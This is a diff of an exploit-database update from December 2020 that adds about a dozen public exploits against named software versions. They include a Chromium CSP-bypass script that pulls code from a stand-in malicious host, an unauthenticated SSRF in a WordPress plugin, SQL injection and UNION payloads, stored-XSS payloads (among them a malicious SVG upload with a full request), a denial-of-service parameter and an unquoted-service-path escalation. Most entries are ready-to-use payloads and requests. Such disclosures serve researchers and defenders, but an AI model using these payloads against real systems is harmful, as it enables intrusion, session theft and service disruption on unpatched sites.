DB: 2020-12-05

13 changes to exploits/shellcodes

IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path
Chromium 83 - Full CSP Bypass
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting
Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection
MiniCMS 1.10 - 'content box' Stored XSS
Testa Online Test Management System 3.4.7 - 'q' SQL Injection
Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting
Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
Laravel Nova 3.7.0 - 'range' DoS
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
Zabbix 5.0.0 - Stored XSS via URL Widget Iframe

exploits/hardware/webapps/48807.txt

@@ -1,4 +1,4 @@
-# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26  - Persistent Cross-Site Scripting
+# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
 # Date: 2020-08-31
 # Exploit Author: Jonatan Schor and Uriel Yochpaz
 # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway

exploits/multiple/local/49195.js

@@ -0,0 +1,34 @@
+#Title: Chromium 83 - Full CSP Bypass
+#Date: 02/09/2020
+#Exploit Author: Gal Weizman
+#Vendor Homepage: https://www.chromium.org/ 
+#Software Link: https://download-chromium.appspot.com/
+#Version: 83
+#Tested On: Mac OS, Windows, iPhone, Android
+#CVE: CVE-2020-6519
+
+(function(){
+
+		var payload = `
+			top.SUCCESS = true;
+			var o = document.createElement("object");
+			o.data = \`http://malicious.com/bypass-object-src.html\`;
+			document.body.appendChild(o);
+			var i = document.createElement("iframe");
+			i.src = \`http://malicious.com/bypass-child-src.html\`;
+			document.body.appendChild(i);
+			var s = document.createElement("script");
+			s.src = \`http://malicious.com/bypass-script-src.js\`;
+			document.body.appendChild(s);
+		`;
+
+		document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
+		setTimeout(() => {
+				if (!top.SUCCESS) {
+						XXX.contentWindow.eval(payload);
+				}
+		});
+
+}())
+
+// further information: https://github.com/weizman/CVE-2020-6519

exploits/multiple/webapps/49189.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
+# Date: 03/12/2020
+# Exploit Author: Pankaj Verma (_p4nk4j)
+# Vendor Homepage: https://www.canto.com/integrations/wordpress/
+# Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin
+# Version: 1.3.0
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978
+
+
+Description:-
+The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities.
+It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter.
+
+Vulnerable Parameters and Endpoints:-
+https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain=
+https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain=
+https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain=
+
+Steps To Reproduce:-
+1. Start a Netcat Listener on any port For e.g. 4499
+2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain="
+3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter.
+4. Observe the response we got from the Target on Attacker's Listener.
+
+Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.

exploits/multiple/webapps/49192.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection
+# Date: 2020-12-04
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://github.com/geraked/phpscript-sgh
+# Software Link: https://github.com/geraked/phpscript-sgh
+# Version: 0.1.0
+# Tested on: Kali Linux
+
+------------------------------------------------------------------------------------------------------------------------
+Source code(localhost/admin/admins.php):
+
+if ($_REQUEST['op']=='add') {
+	$id = $username = $password = $conf_password = $firstname = $lastname = 
+$email = $pic = $_SESSION['aapic'] = "";
+	}
+	else {
+		$result	= $conn->query("SELECT * FROM sgh_admins WHERE 
+id=".test_input($_REQUEST['id'])." LIMIT 1");
+		$row	= $result->fetch_assoc();
+		extract($row);
+		$_SESSION['aapic'] = $pic;
+	}
+
+------------------------------------------------------------------------------------------------------------------------
+Parameter: id (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: op=edit&id=1 AND (SELECT 9367 FROM 
+(SELECT(SLEEP(5)))pBEE)&_pjax=#pjax-container
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 7 columns
+Payload: op=edit&id=-5015 UNION ALL SELECT 
+NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x536b4e4a775448674c73477175675a4c58476659474f524b535456706e7276474251424a4f67744b,0x717a626b71),NULL-- 
+-&_pjax=#pjax-container
+------------------------------------------------------------------------------------------------------------------------

exploits/multiple/webapps/49194.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Testa Online Test Management System 3.4.7 - 'q' SQL Injection
+# Date: 2020-07-21
+# Google Dork: N/A
+# Exploit Author: Ultra Security Team
+# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar
+# Vendor Homepage: https://testa.cc
+# Version: v3.4.7 
+# Tested on: Windows/Linux
+# CVE: N/A
+
+.:: Description ::.
+Testa Helps You To make Online Exams.
+
+.:: Proof Of Concept (PoC) ::.
+Step 1 - Find Your Target Using Testa - Online Test Management System.
+Step 2 - Click on List And Search Exams.
+Step 3 - Inject Your Payloads in Search Field.
+
+.:: Sample Request ::.
+POST / HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: localhost
+Cookie: PHPSESSID=7eg4b3fl6vm8a11kmkh4pkq290; testa_user2=1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 8
+
+p=1&q=-1' UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 #

exploits/php/webapps/49190.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting
+# Date: 3-12-2020
+# Exploit Author: Parshwa Bhavsar
+# Vendor Homepage: https://compo.sr/
+# Software Link: https://compo.sr/download.htm
+# Version: 10.0.34
+# Tested on: Windows 10/ Kali Linux
+
+Steps To Reproduce :-
+
+1. Install the CMS from the download link & configure it.
+2. After configuration login with admin Credential .
+3. You will notice “Add banner” in the top of the browser.
+4. Click on it and Put XSS payload (any) in “Description” field.
+5. Save it & Click on Home.
+6. Every time any user visit the website , the XSS payload will trigger.

exploits/php/webapps/49193.txt

@@ -0,0 +1,16 @@
+# Exploit Title: MiniCMS 1.10 - 'content box' Stored XSS
+# Date: 2019-7-4
+# Exploit Author: yudp
+# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
+# Software Link:https://github.com/bg5sbk/MiniCMS
+# Version: 1.10
+# CVE :CVE-2019-13339
+
+Payload：<script>alert("3: "+document.domain)</script> In /MiniCMS/mc-admin/page-edit.php
+
+POC:
+
+1. Go to the page-edit page and input the payload into the content box ,click save button 
+2.Use burpsuite to edit the payload. Pay attention that the “+” needs to be url-encoded
+3.After that, go to the page we have saved
+4.Window will pop with the domain

exploits/php/webapps/49196.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting
+# Date: 2020-09-02
+# Exploit Author: Dhruv Patel(dhruvp111296)
+# Vendor Homepage: https://savsoftquiz.com/
+# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
+# Version: 5.0
+# Tested on: Windows 10
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in admin
+panel Custom Field section. And Inject JavaScript Malicious code & Steal
+User’s cookie
+
+Vulnerable Parameters: title
+Steps for reproduce:
+1. Go to admin panel’s add custom fields page
+2. Fill the Title name as <script>alert("HELLO XSS")</script> payload in title.
+3. Now Click on Save we can see our payload gets executed.
+4. All Users Can Show our Payload As a xss.

exploits/php/webapps/49197.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting 
+# Date: 04-12-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.formalms.org/download.html
+# Software Link: https://www.formalms.org/
+# Version: 2.3
+# Tested on: Windows 10/Kali Linux
+
+Steps-To-Reproduce:
+1. Go to the Forma LMS and login to your account.
+2. Now go to the User Profile.
+3. Now Edit the profile.
+4. Put the below payload in first and last name:
+"<script>alert(document.cookie)</script>"
+5. Now click on Save button.
+6. The XSS will be triggered.

exploits/php/webapps/49198.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Laravel Nova 3.7.0 - 'range' DoS
+# Date: June 22, 2020
+# Exploit Author: iqzer0
+# Vendor Homepage: https://nova.laravel.com/
+# Software Link: https://nova.laravel.com/releases
+# Version: Version v3.7.0
+# Tested on: Manjaro / Chrome v83
+
+An authenticated user can crash the application by setting a higher
+value to the 'range' (default 30) parameter and sending simultaneous
+requests (10 simultaneous requests was enough to DoS the server in my
+testing)
+
+Vulnerable URL:
+https://example.com/nova-api/metrics/sum-orders?timezone=Indian%2FMaldives&twelveHourTime=true&range=3000000
+Vulnerable Parameter: range

exploits/php/webapps/49199.txt

@@ -0,0 +1,92 @@
+# Exploit Title: CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
+# Date: 04/12/2020
+# Exploit Author: Eshan Singh
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads
+# Version:  cmsms v2.2.15
+# Tested on: Windows/Kali Linux/Ubuntu
+
+Description
+----------------------
+CMS Made Simple 2.2.15 allows an authenticated user with access to the
+Content Manager to edit content and put persistent XSS payload using the
+malicious SVG file. The user can get cookies from every authenticated user
+who visits the website.
+
+SVG Payload
+-------------
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
+"/>
+<script type="text/javascript">
+alert(document.domain);
+</script>
+</svg>
+
+https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg
+
+
+Steps to reproduce
+-------------------
+1. Login into the cmsms admin panel using the admin user.
+2. then go to content > file manager > images, now upload the malicious svg
+(
+https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg)
+file.
+3. now open the svg file location (
+http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! you got the
+popup.
+
+Burp Request
+-------------
+
+POST /cmsms/admin/moduleinterface.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------379224531139948695983200896304
+Content-Length: 1040
+Origin: http://127.0.0.1
+Connection: close
+Cookie:
+a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D;
+__c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv
+
+-----------------------------379224531139948695983200896304
+Content-Disposition: form-data; name="mact"
+
+FileManager,m1_,upload,0
+-----------------------------379224531139948695983200896304
+Content-Disposition: form-data; name="__c"
+
+3d8ee0fbb464e874e82
+-----------------------------379224531139948695983200896304
+Content-Disposition: form-data; name="disable_buffer"
+
+1
+-----------------------------379224531139948695983200896304
+Content-Disposition: form-data; name="m1_files[]"; filename="SVG_XSS.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
+stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.domain);
+   </script>
+</svg>
+-----------------------------379224531139948695983200896304--

exploits/php/webapps/49202.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
+# Date: 8/11/2020
+# Exploit Author: Shwetabh Vishnoi
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://www.zabbix.com/download
+# Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1
+# CVE : CVE-2020-15803
+
+Affected URL/endpoint(s):
+http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check
+
+Affected Param: <iframe src="http://localhost/hello.html" scrolling="auto"
+id="iframe" class="widget-url" width="100%" height="100%"></iframe>
+
+Description: The application contains a widget functionality within Global
+View Dashboard which can be used by a malicious admin to propagate stored
+cross site scripting attack. The “URL” widget iframe does not have any
+inbuilt restrictions for the content executing within.
+
+Impact: The malicious webpages within iframes can be used for hosting forms
+for Phishing, malware propagation, forced redirections etc.
+
+The affected Global View dashboard is displayed to all the users of the
+application, so all the users will be affected with this vulnerability.
+
+Reproduction Steps:
+1. Login to the application with Admin
+2. In Global View Dashboard, Add a widget
+3. Select Type – “URL”, fill any random values for Name, Refresh Interval.
+4. Now, in the URL parameter, enter a malicious URL.
+5. For demo purpose, I have hosted a web server on my machine and hosted a webpage http://localhost/hello.html. (Alternatively, you can use “ http://14.rs” to display popups.)
+6. The malicious webpage containing payload will be executed on the dashboard via iFrame.
+7. The executed content can redirect the user to a malicious page (We have used Bing page for redirection).

exploits/windows/local/49191.txt

@@ -0,0 +1,38 @@
+# Exploit Title: IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path
+# Discovery by: Diego Cañada
+# Software link: https://www.pconlife.com/download/otherfile/20566/90674cffc8658c4f2bf58d43bb9b7ccb/
+# Discovery Date: 2020-12-03
+# Tested Version: 1.0.6499.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home Single Language x64 ES
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i
+"Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Audio service     STacSV     c:\Program Files\IDT\WDM\STacSV64.exe    Auto
+
+# Service info:
+
+C:\>sc qc StacSV
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: StacSV
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe
+        GRUPO_ORDEN_CARGA  : AudioGroup
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Audio Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.

files_exploits.csv

@@ -11219,6 +11219,8 @@ id,file,description,date,author,type,platform,port
 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
 49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
+49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
+49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43406,3 +43408,13 @@ id,file,description,date,author,type,platform,port
 49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
 49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
 49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,
+49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,
+49190,exploits/php/webapps/49190.txt,"Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting",2020-12-04,"Parshwa Bhavsar",webapps,php,
+49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,
+49193,exploits/php/webapps/49193.txt,"MiniCMS 1.10 - 'content box' Stored XSS",2020-12-04,yudp,webapps,php,
+49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple,
+49196,exploits/php/webapps/49196.txt,"Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting",2020-12-04,"Dhruv Patel",webapps,php,
+49197,exploits/php/webapps/49197.txt,"Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting",2020-12-04,"Hemant Patidar",webapps,php,
+49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
+49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
+49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,